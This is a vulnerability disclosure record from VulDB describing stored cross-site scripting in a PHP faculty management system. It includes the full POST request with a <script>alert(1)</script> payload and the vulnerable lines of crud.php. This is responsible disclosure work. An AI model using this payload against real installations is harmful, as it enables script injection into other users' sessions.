Submit #255788: code-projects.org Faculty Management System 1 Stored Cross Site-Scriptinginfo

Titlecode-projects.org Faculty Management System 1 Stored Cross Site-Scripting
Description Stored XSS in http://localhost/gan/admin/pages/subjects.php. Vulnerable software: https://code-projects.org/faculty-management-system-in-php-with-source-code/ Vulnerable request: POST /gan/admin/php/crud.php HTTP/1.1 Host: localhost Content-Length: 112 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/gan/admin/pages/subjects.php Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: fusion7k868_session=0qfpifmqa21t89g6fft0a53hs9; fusion7k868_visited=yes; REFERRER=http%3A%2F%2Flocalhost%2Forangescrum-main%2F; user_uniq_agent=81fa84b75a8024ba76b34e57df459f314694749926581a53872d4b; USERSUB_TYPE=0; IS_MODERATOR=0; SES_ROLE=1; FIRST_INVITE_2=1; CPUID=ac57356acee38e7adfdfe2af0a14fe91; CURRENT_FILTER=cases; DEFAULT_PAGE=dashboard; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; helpdesk_uniq_agent=-1; PHPSESSID=n7ed4n8j05ckj8m7f8npi75pd5 Connection: close action=add-subject&code=<script>alert(1)</script>&desc=<script>alert(1)</script>&units=<script>alert(1)</script> Vulnerable file: admin/php/crud.php Lines: 63-66 $code = sanitized($_POST['code']); $desc = sanitized($_POST['desc']); $units = sanitized($_POST['units']); $data = array('subj_code'=>$code,'subj_desc'=>$desc,'units'=>$units);
Source⚠️ https://drive.google.com/file/d/1XDGcSRytGV11YWuhIuW_4GvD7kEpgjZT/view?usp=sharing
User
 kerkroups (UID 59969)
Submission12/20/2023 18:31 (2 years ago)
Moderation12/21/2023 17:17 (23 hours later)
StatusAccepted
VulDB entry248743 [code-projects Faculty Management System 1.0 subjects.php Description/Units cross site scripting]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!